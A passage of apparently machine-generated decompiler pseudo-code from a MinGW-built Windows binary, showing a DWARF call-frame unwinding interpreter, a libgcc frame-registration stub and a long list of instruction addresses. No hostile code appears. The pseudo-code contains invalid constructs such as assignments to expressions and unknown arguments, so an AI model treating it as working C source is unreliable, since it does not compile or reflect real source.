									__esi = __al & 0x000000ff;
									_v48 = __al & 0x000000ff;
									__esi = __ebx;
									do {
										__esi = __esi + 1;
										__ebx =  *(__esi - 1) & 0x000000ff;
										 *(__esi - 1) & 0x000000ff =  *(__esi - 1) & 0x7f;
										__edx = ( *(__esi - 1) & 0x7f) << __cl;
										__ecx = __ecx + 7;
										__edi = __edi | ( *(__esi - 1) & 0x7f) << __cl;
									} while (__bl < 0);
									__ebx = _a4;
									__edi = __edi *  *(__ebx + 0xac);
									if(__al <= 0x11) {
										__eax = __ebx;
										__ebx = _v48;
										__eax = __eax + _v48 * 8;
										 *(__eax + 4) = 1;
										 *__eax = __edi;
									}
									goto L15;
								} else {
									if(__cl == 0xc0) {
										__eax = __eax & 0x0000003f;
										__edx = __al & 0x000000ff;
										if(__al > 0x11) {
											goto L14;
										} else {
											__eax = _a4;
											__esi = __ebx;
											 *((intOrPtr*)(_a4 + 4 + __edx * 8)) = 0;
										}
										goto L15;
									} else {
										if(__al > 0x2f) {
											L128:
											abort();
											abort();
											abort();
											abort();
											abort();
											abort();
											abort();
											abort();
											abort();
											abort();
											abort();
											abort();
											abort();
											abort();
											_push(_t173);
											_push(_t175);
											_t182 = _t180 - 0x1c;
											 *_t182 = "libgcc_s_dw2-1.dll";
											_t163 = GetModuleHandleA(_t169);
											_t183 = _t182 - 4;
											if(_t163 == 0) {
												 *0x49f004 = 0x410d00;
												_t176 = E00410B90;
											} else {
												_t170 = _t163;
												 *_t183 = "libgcc_s_dw2-1.dll";
												_t166 = LoadLibraryA(??);
												_t185 = _t183 - 4;
												 *0x4e5df0 = _t166;
												_v116 = "__register_frame_info";
												 *_t185 = _t170;
												_t167 = GetProcAddress(??, ??);
												_t186 = _t185 - 8;
												_t176 = _t167;
												_v116 = "__deregister_frame_info";
												 *_t186 = _t170;
												 *0x49f004 = GetProcAddress(??, ??);
												_t183 = _t186 - 8;
											}
											if(_t176 != 0) {
												_v116 = 0x4e501c;
												 *_t183 = 0x4ab0f8;
												 *_t176();
											}
											 *_t183 = E00401590;
											return E004014C0();
										} else {
											switch( *((intOrPtr*)(__eax * 4 +  &M004A4960))) {
												case 0:
													L14:
													__esi = __ebx;
													goto L15;
												case 1:
													__eax = _a4;
													__edx = _v56;
													_t45 = __eax + 0xb8; // 0x1e8bfce6
													__esi =  *_t45 & 0x000000ff;
													__eax = __esi;
													__eax = E0040D720(__esi, __ecx, _v56);
													__edx =  &_v32;
													__ecx = __ebx;
													 *__esp =  &_v32;
													__edx = __eax;
													__eax = __esi;
													__eax = E0040D5E0(__esi, __ebx, __edx);
													__edi = _a4;
													__esi = __eax;
													__eax = _v32;
													 *(_a4 + 0xa4) = _v32;
													goto L15;
												case 2:
													__edi = _a4;
													__eax =  *(__esi + 1) & 0x000000ff;
													__esi = __esi + 2;
													_t52 = 0xb0 + __edi; // 0x8b03c683
													__eax = __eax *  *_t52;
													 *(_a4 + 0xa4) = __eax;
													goto L15;
												case 3:
													__edi = _a4;
													__eax =  *(__esi + 1) & 0x0000ffff;
													__esi = __esi + 3;
													_t56 = 0xb0 + __edi; // 0x8b03c683
													__eax = __eax *  *_t56;
													 *(_a4 + 0xa4) = __eax;
													goto L15;
												case 4:
													__eax = _a4;
													__edi = _a4;
													__esi = __esi + 5;
													_t60 = __eax + 0xb0; // 0x8b03c683
													 *_t60 =  *_t60 *  *(__esi - 4);
													__eax =  *_t60 *  *(__esi - 4) + __edx;
													 *(_a4 + 0xa4) =  *_t60 *  *(__esi - 4) + __edx;
													goto L15;
												case 5:
													__edi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__edi = __edi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													goto L36;
												case 6:
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													goto L40;
												case 7:
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													if(__esi > 0x11) {
														goto L14;
													} else {
														__eax = _a4;
														 *((intOrPtr*)(_a4 + 4 + __esi * 8)) = 6;
														__esi = __ebx;
													}
													goto L15;
												case 8:
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													L40:
													if(__esi > 0x11) {
														goto L14;
													} else {
														__eax = _a4;
														 *((intOrPtr*)(_a4 + 4 + __esi * 8)) = 0;
														__esi = __ebx;
													}
													goto L15;
												case 9:
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__edi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__edi = __edi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													if(__esi > 0x11) {
														goto L14;
													} else {
														__eax = _a4;
														__eax = _a4 + __esi * 8;
														__esi = __ebx;
														 *(__eax + 4) = 2;
														 *__eax = __edi;
													}
													goto L15;
												case 0xa:
													__esi = _v60;
													__eax = __esi;
													if(__esi == 0) {
														__eax = 0xb0;
														__esp = __esp - E0040D390(0xb0);
														__eax =  &_v57;
														__eax =  &_v57 & 0xfffffff0;
													} else {
														_v60 = __esi;
													}
													__ecx = 0x29;
													__edi = __eax;
													__esi = _a4;
													__eax = memcpy(__eax, __esi, 0x29 << 2);
													__esi + __ecx = __esi + __ecx + __ecx;
													__ecx = 0;
													__esi = _a4;
													 *(_a4 + 0x90) = __eax;
													__esi = __ebx;
													goto L15;
												case 0xb:
													__eax = _a4;
													__ecx = 0x29;
													__edi = _a4;
													_t96 = __eax + 0x90; // 0x74450f10
													__eax =  *_t96;
													__esi =  *_t96;
													__eax = memcpy(_a4, __esi, 0x29 << 2);
													__esi + __ecx = __esi + __ecx + __ecx;
													__ecx = 0;
													__esi = _v60;
													_v60 = __eax;
													 *(__eax + 0x90) = _v60;
													__esi = __ebx;
													goto L15;
												case 0xc:
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__eax = _a4;
													__ecx = 0;
													 *(_a4 + 0x98) = __esi;
													__esi = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__eax = _a4;
													 *(__eax + 0x94) = __esi;
													__esi = __ebx;
													 *(__eax + 0xa0) = 1;
													goto L15;
												case 0xd:
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__eax = _a4;
													 *(__eax + 0x98) = __esi;
													__esi = __ebx;
													 *(__eax + 0xa0) = 1;
													goto L15;
												case 0xe:
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__eax = _a4;
													 *(_a4 + 0x94) = __esi;
													__esi = __ebx;
													goto L15;
												case 0xf:
													__eax = _a4;
													__esi = 0;
													__ecx = 0;
													 *(__eax + 0x9c) = __ebx;
													 *(__eax + 0xa0) = 2;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__esi = __esi + __ebx;
													goto L15;
												case 0x10:
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													if(__esi <= 0x11) {
														__eax = _a4;
														__eax = _a4 + __esi * 8;
														 *(__eax + 4) = 3;
														 *__eax = __ebx;
													}
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__esi = __esi + __ebx;
													goto L15;
												case 0x11:
													__edi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__edi = __edi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														__edx = __edx & 0x0000007f;
														__eax = (__edx & 0x0000007f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | (__edx & 0x0000007f) << __cl;
													} while (__dl < 0);
													if(__ecx <= 0x1f && __edx != 0) {
														1 = 1 << __cl;
														__eax =  ~(1 << __cl);
														__esi = __esi |  ~(1 << __cl);
													}
													L36:
													__eax = _a4;
													_t66 = __eax + 0xac; // 0x26748d
													__esi = __esi *  *_t66;
													if(__edi > 0x11) {
														goto L14;
													} else {
														__eax = __eax + __edi * 8;
														 *__eax = __esi;
														__esi = __ebx;
														 *(__eax + 4) = 1;
													}
													goto L15;
												case 0x12:
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__eax = _a4;
													__ecx = 0;
													 *(_a4 + 0x98) = __esi;
													__esi = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														__edx = __edx & 0x0000007f;
														__eax = (__edx & 0x0000007f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | (__edx & 0x0000007f) << __cl;
													} while (__dl < 0);
													if(__ecx <= 0x1f && __edx != 0) {
														1 = 1 << __cl;
														__eax =  ~(1 << __cl);
														__esi = __esi |  ~(1 << __cl);
													}
													__eax = _a4;
													__esi = __esi *  *(__eax + 0xac);
													 *(__eax + 0xa0) = 1;
													 *(__eax + 0x94) = __esi;
													__esi = __ebx;
													goto L15;
												case 0x13:
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														__edx = __edx & 0x0000007f;
														__eax = (__edx & 0x0000007f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | (__edx & 0x0000007f) << __cl;
													} while (__dl < 0);
													if(__ecx <= 0x1f && __edx != 0) {
														1 = 1 << __cl;
														__eax =  ~(1 << __cl);
														__esi = __esi |  ~(1 << __cl);
													}
													__eax = _a4;
													 *(__eax + 0x94) = __esi;
													__esi = __ebx;
													goto L15;
												case 0x14:
													__edi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__edi = __edi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													goto L105;
												case 0x15:
													__edi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__edi = __edi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														__edx = __edx & 0x0000007f;
														__eax = (__edx & 0x0000007f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | (__edx & 0x0000007f) << __cl;
													} while (__dl < 0);
													if(__ecx <= 0x1f && __edx != 0) {
														1 = 1 << __cl;
														__eax =  ~(1 << __cl);
														__esi = __esi |  ~(1 << __cl);
													}
													L105:
													__eax = _a4;
													__esi = __esi *  *(__eax + 0xac);
													if(__edi > 0x11) {
														goto L14;
													} else {
														__eax = __eax + __edi * 8;
														 *__eax = __esi;
														__esi = __ebx;
														 *(__eax + 4) = 4;
													}
													goto L15;
												case 0x16:
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													if(__esi <= 0x11) {
														__eax = _a4;
														__eax = _a4 + __esi * 8;
														 *(__eax + 4) = 5;
														 *__eax = __ebx;
													}
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__esi = __esi + __ebx;
													goto L15;
												case 0x17:
													goto L128;
												case 0x18:
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__eax = _v56;
													 *(_v56 + 0x68) = __esi;
													__esi = __ebx;
													goto L15;
												case 0x19:
													__edi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__edi = __edi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__esi = 0;
													__ecx = 0;
													do {
														__ebx = __ebx + 1;
														__edx =  *(__ebx - 1) & 0x000000ff;
														 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
														__eax = ( *(__ebx - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
													} while (__dl < 0);
													__eax = _a4;
													__esi = __esi *  *(__eax + 0xac);
													if(__edi > 0x11) {
														goto L14;
													} else {
														__eax = __eax + __edi * 8;
														 *__eax = __esi;
														__esi = __ebx;
														 *(__eax + 4) = 1;
													}
													L15:
													if(_v52 <= __esi) {
														goto L17;
													} else {
														goto L16;
													}
													goto L142;
											}
										}
									}
								}
							}
							goto L142;
							L16:
							__eax = _a4;
							__edi = _v56;
							_t20 = __eax + 0xa4; // 0x5bd0891c
							__edx =  *_t20;
							__eax =  *(__edi + 0x60);
							_v48 = __eax;
							__eax = __eax >> 0x1f;
						} while (__edx < __eax);
					}
					goto L17;
				}
				L142:
			}






























                                                                                                                            0x0040d760
                                                                                                                            0x0040d765
                                                                                                                            0x0040d768
                                                                                                                            0x0040d76b
                                                                                                                            0x0040d76e
                                                                                                                            0x0040d771
                                                                                                                            0x0040d774
                                                                                                                            0x0040d780
                                                                                                                            0x0040d7f3
                                                                                                                            0x0040d7fa
                                                                                                                            0x0040d782
                                                                                                                            0x0040d782
                                                                                                                            0x0040d785
                                                                                                                            0x0040d78b
                                                                                                                            0x0040d78e
                                                                                                                            0x0040d796
                                                                                                                            0x0040d798
                                                                                                                            0x0040d7a0
                                                                                                                            0x0040d7a0
                                                                                                                            0x0040d7a3
                                                                                                                            0x0040d7a3
                                                                                                                            0x0040d7a6
                                                                                                                            0x0040d7a8
                                                                                                                            0x0040d7ae
                                                                                                                            0x0040d800
                                                                                                                            0x0040d803
                                                                                                                            0x0040d806
                                                                                                                            0x0040d808
                                                                                                                            0x0040d811
                                                                                                                            0x00000000
                                                                                                                            0x0040d7b0
                                                                                                                            0x0040d7b3
                                                                                                                            0x0040d840
                                                                                                                            0x0040d843
                                                                                                                            0x0040d845
                                                                                                                            0x0040d847
                                                                                                                            0x0040d84a
                                                                                                                            0x0040d84d
                                                                                                                            0x0040d850
                                                                                                                            0x0040d850
                                                                                                                            0x0040d853
                                                                                                                            0x0040d859
                                                                                                                            0x0040d85c
                                                                                                                            0x0040d85e
                                                                                                                            0x0040d861
                                                                                                                            0x0040d863
                                                                                                                            0x0040d867
                                                                                                                            0x0040d86a
                                                                                                                            0x0040d873
                                                                                                                            0x0040d879
                                                                                                                            0x0040d87b
                                                                                                                            0x0040d87e
                                                                                                                            0x0040d881
                                                                                                                            0x0040d888
                                                                                                                            0x0040d888
                                                                                                                            0x00000000
                                                                                                                            0x0040d7b9
                                                                                                                            0x0040d7bc
                                                                                                                            0x0040d820
                                                                                                                            0x0040d823
                                                                                                                            0x0040d828
                                                                                                                            0x00000000
                                                                                                                            0x0040d82a
                                                                                                                            0x0040d82a
                                                                                                                            0x0040d82d
                                                                                                                            0x0040d82f
                                                                                                                            0x0040d82f
                                                                                                                            0x00000000
                                                                                                                            0x0040d7be
                                                                                                                            0x0040d7c0
                                                                                                                            0x004986e1
                                                                                                                            0x004986e1
                                                                                                                            0x004986e6
                                                                                                                            0x004986eb
                                                                                                                            0x004986f0
                                                                                                                            0x004986f5
                                                                                                                            0x004986fa
                                                                                                                            0x004986ff
                                                                                                                            0x00498704
                                                                                                                            0x00498709
                                                                                                                            0x0049870e
                                                                                                                            0x00498713
                                                                                                                            0x00498718
                                                                                                                            0x00498720
                                                                                                                            0x00498725
                                                                                                                            0x004014e3
                                                                                                                            0x004014e4
                                                                                                                            0x004014e6
                                                                                                                            0x004014e9
                                                                                                                            0x004014f0
                                                                                                                            0x004014f6
                                                                                                                            0x004014fb
                                                                                                                            0x00401570
                                                                                                                            0x0040157a
                                                                                                                            0x004014fd
                                                                                                                            0x004014fd
                                                                                                                            0x004014ff
                                                                                                                            0x00401506
                                                                                                                            0x00401512
                                                                                                                            0x00401515
                                                                                                                            0x0040151a
                                                                                                                            0x00401522
                                                                                                                            0x00401525
                                                                                                                            0x00401527
                                                                                                                            0x0040152a
                                                                                                                            0x0040152c
                                                                                                                            0x00401534
                                                                                                                            0x00401539
                                                                                                                            0x0040153e
                                                                                                                            0x0040153e
                                                                                                                            0x00401543
                                                                                                                            0x00401545
                                                                                                                            0x0040154d
                                                                                                                            0x00401554
                                                                                                                            0x00401554
                                                                                                                            0x00401556
                                                                                                                            0x00401569
                                                                                                                            0x0040d7c6
                                                                                                                            0x0040d7c6
                                                                                                                            0x00000000
                                                                                                                            0x0040d7d0
                                                                                                                            0x0040d7d0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d8c0
                                                                                                                            0x0040d8c3
                                                                                                                            0x0040d8c6
                                                                                                                            0x0040d8c6
                                                                                                                            0x0040d8cd
                                                                                                                            0x0040d8cf
                                                                                                                            0x0040d8d4
                                                                                                                            0x0040d8d7
                                                                                                                            0x0040d8d9
                                                                                                                            0x0040d8dc
                                                                                                                            0x0040d8de
                                                                                                                            0x0040d8e0
                                                                                                                            0x0040d8e5
                                                                                                                            0x0040d8e8
                                                                                                                            0x0040d8ea
                                                                                                                            0x0040d8ed
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d900
                                                                                                                            0x0040d903
                                                                                                                            0x0040d907
                                                                                                                            0x0040d90a
                                                                                                                            0x0040d90a
                                                                                                                            0x0040d913
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d920
                                                                                                                            0x0040d923
                                                                                                                            0x0040d927
                                                                                                                            0x0040d92a
                                                                                                                            0x0040d92a
                                                                                                                            0x0040d933
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d940
                                                                                                                            0x0040d943
                                                                                                                            0x0040d946
                                                                                                                            0x0040d949
                                                                                                                            0x0040d94f
                                                                                                                            0x0040d953
                                                                                                                            0x0040d955
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d960
                                                                                                                            0x0040d962
                                                                                                                            0x0040d964
                                                                                                                            0x0040d964
                                                                                                                            0x0040d967
                                                                                                                            0x0040d96d
                                                                                                                            0x0040d970
                                                                                                                            0x0040d972
                                                                                                                            0x0040d975
                                                                                                                            0x0040d977
                                                                                                                            0x0040d97b
                                                                                                                            0x0040d97d
                                                                                                                            0x0040d980
                                                                                                                            0x0040d980
                                                                                                                            0x0040d983
                                                                                                                            0x0040d989
                                                                                                                            0x0040d98c
                                                                                                                            0x0040d98e
                                                                                                                            0x0040d991
                                                                                                                            0x0040d993
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040d9c0
                                                                                                                            0x0040d9c2
                                                                                                                            0x0040d9c4
                                                                                                                            0x0040d9c4
                                                                                                                            0x0040d9c7
                                                                                                                            0x0040d9cd
                                                                                                                            0x0040d9d0
                                                                                                                            0x0040d9d2
                                                                                                                            0x0040d9d5
                                                                                                                            0x0040d9d7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040da00
                                                                                                                            0x0040da02
                                                                                                                            0x0040da04
                                                                                                                            0x0040da04
                                                                                                                            0x0040da07
                                                                                                                            0x0040da0d
                                                                                                                            0x0040da10
                                                                                                                            0x0040da12
                                                                                                                            0x0040da15
                                                                                                                            0x0040da17
                                                                                                                            0x0040da1e
                                                                                                                            0x00000000
                                                                                                                            0x0040da24
                                                                                                                            0x0040da24
                                                                                                                            0x0040da27
                                                                                                                            0x0040da2f
                                                                                                                            0x0040da2f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040da40
                                                                                                                            0x0040da42
                                                                                                                            0x0040da44
                                                                                                                            0x0040da44
                                                                                                                            0x0040da47
                                                                                                                            0x0040da4d
                                                                                                                            0x0040da50
                                                                                                                            0x0040da52
                                                                                                                            0x0040da55
                                                                                                                            0x0040da57
                                                                                                                            0x0040d9db
                                                                                                                            0x0040d9de
                                                                                                                            0x00000000
                                                                                                                            0x0040d9e4
                                                                                                                            0x0040d9e4
                                                                                                                            0x0040d9e7
                                                                                                                            0x0040d9ef
                                                                                                                            0x0040d9ef
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040da60
                                                                                                                            0x0040da62
                                                                                                                            0x0040da64
                                                                                                                            0x0040da64
                                                                                                                            0x0040da67
                                                                                                                            0x0040da6d
                                                                                                                            0x0040da70
                                                                                                                            0x0040da72
                                                                                                                            0x0040da75
                                                                                                                            0x0040da77
                                                                                                                            0x0040da7b
                                                                                                                            0x0040da7d
                                                                                                                            0x0040da80
                                                                                                                            0x0040da80
                                                                                                                            0x0040da83
                                                                                                                            0x0040da89
                                                                                                                            0x0040da8c
                                                                                                                            0x0040da8e
                                                                                                                            0x0040da91
                                                                                                                            0x0040da93
                                                                                                                            0x0040da9a
                                                                                                                            0x00000000
                                                                                                                            0x0040daa0
                                                                                                                            0x0040daa0
                                                                                                                            0x0040daa3
                                                                                                                            0x0040daa6
                                                                                                                            0x0040daa8
                                                                                                                            0x0040daaf
                                                                                                                            0x0040daaf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040dac0
                                                                                                                            0x0040dac3
                                                                                                                            0x0040dac7
                                                                                                                            0x0040df19
                                                                                                                            0x0040df23
                                                                                                                            0x0040df25
                                                                                                                            0x0040df29
                                                                                                                            0x0040dacd
                                                                                                                            0x0040dad3
                                                                                                                            0x0040dad3
                                                                                                                            0x0040dad6
                                                                                                                            0x0040dadb
                                                                                                                            0x0040dadd
                                                                                                                            0x0040dae0
                                                                                                                            0x0040dae0
                                                                                                                            0x0040dae0
                                                                                                                            0x0040dae2
                                                                                                                            0x0040dae5
                                                                                                                            0x0040daeb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040daf2
                                                                                                                            0x0040daf5
                                                                                                                            0x0040dafa
                                                                                                                            0x0040dafd
                                                                                                                            0x0040dafd
                                                                                                                            0x0040db03
                                                                                                                            0x0040db05
                                                                                                                            0x0040db05
                                                                                                                            0x0040db05
                                                                                                                            0x0040db07
                                                                                                                            0x0040db0a
                                                                                                                            0x0040db0d
                                                                                                                            0x0040db13
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040db20
                                                                                                                            0x0040db22
                                                                                                                            0x0040db24
                                                                                                                            0x0040db24
                                                                                                                            0x0040db27
                                                                                                                            0x0040db2d
                                                                                                                            0x0040db30
                                                                                                                            0x0040db32
                                                                                                                            0x0040db35
                                                                                                                            0x0040db37
                                                                                                                            0x0040db3b
                                                                                                                            0x0040db3e
                                                                                                                            0x0040db40
                                                                                                                            0x0040db46
                                                                                                                            0x0040db50
                                                                                                                            0x0040db50
                                                                                                                            0x0040db53
                                                                                                                            0x0040db59
                                                                                                                            0x0040db5c
                                                                                                                            0x0040db5e
                                                                                                                            0x0040db61
                                                                                                                            0x0040db63
                                                                                                                            0x0040db67
                                                                                                                            0x0040db6a
                                                                                                                            0x0040db70
                                                                                                                            0x0040db72
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040db81
                                                                                                                            0x0040db83
                                                                                                                            0x0040db85
                                                                                                                            0x0040db85
                                                                                                                            0x0040db88
                                                                                                                            0x0040db8e
                                                                                                                            0x0040db91
                                                                                                                            0x0040db93
                                                                                                                            0x0040db96
                                                                                                                            0x0040db98
                                                                                                                            0x0040db9c
                                                                                                                            0x0040db9f
                                                                                                                            0x0040dba5
